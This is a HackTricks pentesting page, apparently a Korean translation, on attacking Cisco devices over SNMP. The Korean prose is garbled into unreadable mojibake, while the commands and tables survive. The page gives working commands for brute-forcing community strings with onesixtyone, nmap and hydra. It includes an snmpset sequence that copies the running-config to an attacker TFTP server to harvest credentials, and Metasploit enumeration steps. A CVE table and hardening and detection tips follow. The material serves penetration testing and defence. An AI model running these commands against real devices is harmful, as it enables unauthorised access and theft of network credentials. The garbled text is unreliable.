Cisco SNMP
Tip
AWS ํดํน ๋ฐฐ์ฐ๊ธฐ ๋ฐ ์ฐ์ตํ๊ธฐ:
HackTricks Training AWS Red Team Expert (ARTE)
GCP ํดํน ๋ฐฐ์ฐ๊ธฐ ๋ฐ ์ฐ์ตํ๊ธฐ:HackTricks Training GCP Red Team Expert (GRTE)
Azure ํดํน ๋ฐฐ์ฐ๊ธฐ ๋ฐ ์ฐ์ตํ๊ธฐ:
HackTricks Training Azure Red Team Expert (AzRTE)
HackTricks ์ง์ํ๊ธฐ
- ๊ตฌ๋ ๊ณํ ํ์ธํ๊ธฐ!
- **๐ฌ ๋์ค์ฝ๋ ๊ทธ๋ฃน ๋๋ ํ ๋ ๊ทธ๋จ ๊ทธ๋ฃน์ ์ฐธ์ฌํ๊ฑฐ๋ ํธ์ํฐ ๐ฆ @hacktricks_live๋ฅผ ํ๋ก์ฐํ์ธ์.
- HackTricks ๋ฐ HackTricks Cloud ๊นํ๋ธ ๋ฆฌํฌ์งํ ๋ฆฌ์ PR์ ์ ์ถํ์ฌ ํดํน ํธ๋ฆญ์ ๊ณต์ ํ์ธ์.
Pentesting Cisco Networks
SNMP๋ ์ผ๋ฐ ๋ฉ์์ง์ ๋ํด 161/UDP ํฌํธ์ ํธ๋ฉ ๋ฉ์์ง์ ๋ํด 162/UDP ํฌํธ๋ฅผ ์ฌ์ฉํ์ฌ UDP์์ ์๋ํฉ๋๋ค. ์ด ํ๋กํ ์ฝ์ SNMP ์์ด์ ํธ์ ๊ด๋ฆฌ์ ๊ฐ์ ํต์ ์ ๊ฐ๋ฅํ๊ฒ ํ๋ ํ๋ฌธ โ๋น๋ฐ๋ฒํธโ ์ญํ ์ ํ๋ ์ปค๋ฎค๋ํฐ ๋ฌธ์์ด์ ์์กดํฉ๋๋ค. ์ด๋ฌํ ๋ฌธ์์ด์ ์ ๊ทผ ์์ค์ ๊ฒฐ์ ํ๋ฉฐ, ํนํ ์ฝ๊ธฐ ์ ์ฉ(RO) ๋๋ ์ฝ๊ธฐ-์ฐ๊ธฐ(RW) ๊ถํ์ ์ค์ ํฉ๋๋ค.
๊ณ ์ ์ ์ด์ง๋ง ์ฌ์ ํ ๋งค์ฐ ํจ๊ณผ์ ์ธ ๊ณต๊ฒฉ ๋ฒกํฐ๋ ์ปค๋ฎค๋ํฐ ๋ฌธ์์ด์ ๋ฌด์ฐจ๋ณ ๋์ ํ์ฌ ์ธ์ฆ๋์ง ์์ ์ฌ์ฉ์์์ ์ฅ์น ๊ด๋ฆฌ์(RW ์ปค๋ฎค๋ํฐ)๋ก ์์นํ๋ ๊ฒ์ ๋๋ค. ์ด ์์ ์ ์ํ ์ค์ฉ์ ์ธ ๋๊ตฌ๋ onesixtyone:
onesixtyone -c community_strings.txt -i targets.txt
๋ค๋ฅธ ๋น ๋ฅธ ์ต์
์ Nmap NSE ์คํฌ๋ฆฝํธ snmp-brute ๋๋ Hydra์ SNMP ๋ชจ๋์
๋๋ค:
nmap -sU -p161 --script snmp-brute --script-args brute.community=wordlist 10.0.0.0/24
hydra -P wordlist.txt -s 161 10.10.10.1 snmp
SNMP๋ฅผ ํตํ ๊ตฌ์ฑ ๋คํ (CISCO-CONFIG-COPY-MIB)
RW ์ปค๋ฎค๋ํฐ๋ฅผ ์ป์ผ๋ฉด CLI ์ ๊ทผ ์์ด CISCO-CONFIG-COPY-MIB (1.3.6.1.4.1.9.9.96)๋ฅผ ์
์ฉํ์ฌ ์คํ ์ค์ธ ๊ตฌ์ฑ/์์ ๊ตฌ์ฑ์ TFTP/FTP ์๋ฒ๋ก ๋ณต์ฌํ ์ ์์ต๋๋ค. ๋ ๊ฐ์ง ์ผ๋ฐ์ ์ธ ์ ๊ทผ ๋ฐฉ์์ ๋ค์๊ณผ ๊ฐ์ต๋๋ค:
- Nmap NSE โ
snmp-ios-config
nmap -sU -p161 --script snmp-ios-config \
--script-args creds.snmp=private 192.168.66.1
์คํฌ๋ฆฝํธ๋ ๋ณต์ฌ ์์ ์ ์๋์ผ๋ก ์กฐ์ ํ๊ณ ๊ตฌ์ฑ์ stdout์ ์ถ๋ ฅํฉ๋๋ค.
- ์๋
snmpset์ํ์ค
# Copy running-config (4) to a TFTP server (1) โ random row id 1234
snmpset -v2c -c private 192.168.66.1 \
1.3.6.1.4.1.9.9.96.1.1.1.1.2.1234 i 1 \ # protocol = tftp
1.3.6.1.4.1.9.9.96.1.1.1.1.3.1234 i 4 \ # sourceFileType = runningConfig
1.3.6.1.4.1.9.9.96.1.1.1.1.4.1234 i 1 \ # destFileType = networkFile
1.3.6.1.4.1.9.9.96.1.1.1.1.5.1234 a 10.10.14.8 \ # TFTP server IP
1.3.6.1.4.1.9.9.96.1.1.1.1.6.1234 s \"backup.cfg\" \\
1.3.6.1.4.1.9.9.96.1.1.1.1.14.1234 i 4 # rowStatus = createAndGo
ํ ์๋ณ์๋ ์ผํ์ฑ์
๋๋ค; 5๋ถ ์ด๋ด์ ์ฌ์ฌ์ฉํ๋ฉด inconsistentValue ์ค๋ฅ๊ฐ ๋ฐ์ํฉ๋๋ค.
ํ์ผ์ด TFTP ์๋ฒ์ ์์ผ๋ฉด ์๊ฒฉ ์ฆ๋ช
(enable secret, username <user> secret ๋ฑ)์ ๊ฒ์ฌํ๊ฑฐ๋ ์์ ๋ ๊ตฌ์ฑ์ ์ฅ์น๋ก ๋ค์ ํธ์ํ ์ ์์ต๋๋ค.
Metasploit goodies
cisco_config_tftpโ ๋์ผํ MIB๋ฅผ ์ ์ฉํ ํ TFTP๋ฅผ ํตํด running-config/startup-config๋ฅผ ๋ค์ด๋ก๋ํฉ๋๋ค.snmp_enumโ ์ฅ์น ์ธ๋ฒคํ ๋ฆฌ ์ ๋ณด, VLAN, ์ธํฐํ์ด์ค ์ค๋ช , ARP ํ ์ด๋ธ ๋ฑ์ ์์งํฉ๋๋ค.
use auxiliary/scanner/snmp/snmp_enum
set RHOSTS 10.10.100.10
set COMMUNITY public
run
์ต๊ทผ Cisco SNMP ์ทจ์ฝ์ (2023 โ 2025)
๋ฒค๋ ๊ถ๊ณ ์ฌํญ์ ์ถ์ ํ๋ ๊ฒ์ ์ฐธ์ฌ ๋ด์์ ์ ๋ก๋ฐ์ด-ํฌ-์๋ฐ์ด ๊ธฐํ๋ฅผ ๋ฒ์ ์ง์ ํ๋ ๋ฐ ์ ์ฉํฉ๋๋ค:
| ์ฐ๋ | CVE | ์ํฅ์ ๋ฐ๋ ๊ธฐ๋ฅ | ์ํฅ |
|---|---|---|---|
| 2025 | CVE-2025-20174 | SNMP ์๋ธ์์คํ | ์กฐ์๋ ํจํท์ด IOS/IOS-XE (v1/v2c/v3)์์ ์ธ์ฆ๋ DoS (์ฌ์์)๋ฅผ ์ ๋ฐํฉ๋๋ค. |
| 2024 | CVE-2024-20373 | IPv4 ACL ์ฒ๋ฆฌ | ์๋ชป ๊ตฌ์ฑ๋ ํ์ฅ ACL์ด ์กฐ์ฉํ ์คํจํ์ฌ ์ ํจํ ์ปค๋ฎค๋ํฐ/์ฌ์ฉ์๊ฐ ์๋ ค์ง ๊ฒฝ์ฐ ์ธ์ฆ๋์ง ์์ SNMP ํด๋ง์ ํ์ฉํฉ๋๋ค. |
| 2025 | (์์ง CVE ์์) | SNMPv3 ๊ตฌ์ฑ ์ ํ ์ฐํ | ์ ํจํ v3 ์ฌ์ฉ์๊ฐ ๊ฑฐ๋ถ๋์ด์ผ ํ๋ ์ฃผ์์์ ํด๋งํ ์ ์์ต๋๋ค. |
์ ์ฉ ๊ฐ๋ฅ์ฑ์ ์ข ์ข ์ปค๋ฎค๋ํฐ ๋ฌธ์์ด์ด๋ v3 ์๊ฒฉ ์ฆ๋ช ์ ์์ ํ๋ ๋ฐ ์ฌ์ ํ ์์กดํฉ๋๋ค. ์ด๋ ๋ฌด์์ ๋์ ๊ณต๊ฒฉ์ด ์ฌ์ ํ ๊ด๋ จ์ฑ์ด ์๋ ๋ ๋ค๋ฅธ ์ด์ ์ ๋๋ค.
๊ฐํ ๋ฐ ํ์ง ํ
- ์์ ๋ IOS/IOS-XE ๋ฒ์ ์ผ๋ก ์ ๊ทธ๋ ์ด๋ํ์ญ์์ค (์์ CVE์ ๋ํ Cisco ๊ถ๊ณ ์ฐธ์กฐ).
- v1/v2c๋ณด๋ค
authPriv(SHA-256/AES-256)๋ฅผ ์ฌ์ฉํ๋ SNMPv3๋ฅผ ์ ํธํ์ญ์์ค.
snmp-server group SECURE v3 priv
snmp-server user monitor SECURE v3 auth sha <authpass> priv aes 256 <privpass>
- SNMP๋ฅผ ๊ด๋ฆฌ VRF์ ๋ฐ์ธ๋ฉํ๊ณ ํ์ค ๋ฒํธ๊ฐ ๋งค๊ฒจ์ง IPv4 ACL๋ก ์ ํํ์ญ์์ค (ํ์ฅ๋ ์ด๋ฆ ACL์ ์ํํฉ๋๋ค โ CVE-2024-20373).
- RW ์ปค๋ฎค๋ํฐ๋ฅผ ๋นํ์ฑํํ์ญ์์ค; ์ด์์ ํ์ํ ๊ฒฝ์ฐ ACL ๋ฐ ๋ทฐ๋ก ์ ํํ์ญ์์ค:
snmp-server community <string> RW 99 view SysView - ๋ค์์ ๋ชจ๋ํฐ๋งํ์ญ์์ค:
- UDP/161 ๊ธ์ฆ ๋๋ ์์์น ๋ชปํ ์ถ์ฒ (SIEM ๊ท์น).
- ๋น๋์ญ ๊ตฌ์ฑ ๋ณ๊ฒฝ์ ๋ํ๋ด๋
CISCO-CONFIG-MAN-MIB::ccmHistoryEventConfigSource์ด๋ฒคํธ.
- ํน์ DoS ๋ฒกํฐ๋ฅผ ์ค์ด๊ธฐ ์ํด SNMPv3 ๋ก๊น
๋ฐ
snmp-server packetsize 1500์ ํ์ฑํํ์ญ์์ค.
์ฐธ์กฐ
- Cisco: Cisco ์ฅ์น ๊ฐ ๊ตฌ์ฑ ๋ณต์ฌ ๋ฐฉ๋ฒ
- Cisco ๋ณด์ ๊ถ๊ณ cisco-sa-snmp-uwBXfqww (CVE-2024-20373)
Tip
AWS ํดํน ๋ฐฐ์ฐ๊ธฐ ๋ฐ ์ฐ์ตํ๊ธฐ:
HackTricks Training AWS Red Team Expert (ARTE)
GCP ํดํน ๋ฐฐ์ฐ๊ธฐ ๋ฐ ์ฐ์ตํ๊ธฐ:HackTricks Training GCP Red Team Expert (GRTE)
Azure ํดํน ๋ฐฐ์ฐ๊ธฐ ๋ฐ ์ฐ์ตํ๊ธฐ:
HackTricks Training Azure Red Team Expert (AzRTE)
HackTricks ์ง์ํ๊ธฐ
- ๊ตฌ๋ ๊ณํ ํ์ธํ๊ธฐ!
- **๐ฌ ๋์ค์ฝ๋ ๊ทธ๋ฃน ๋๋ ํ ๋ ๊ทธ๋จ ๊ทธ๋ฃน์ ์ฐธ์ฌํ๊ฑฐ๋ ํธ์ํฐ ๐ฆ @hacktricks_live๋ฅผ ํ๋ก์ฐํ์ธ์.
- HackTricks ๋ฐ HackTricks Cloud ๊นํ๋ธ ๋ฆฌํฌ์งํ ๋ฆฌ์ PR์ ์ ์ถํ์ฌ ํดํน ํธ๋ฆญ์ ๊ณต์ ํ์ธ์.


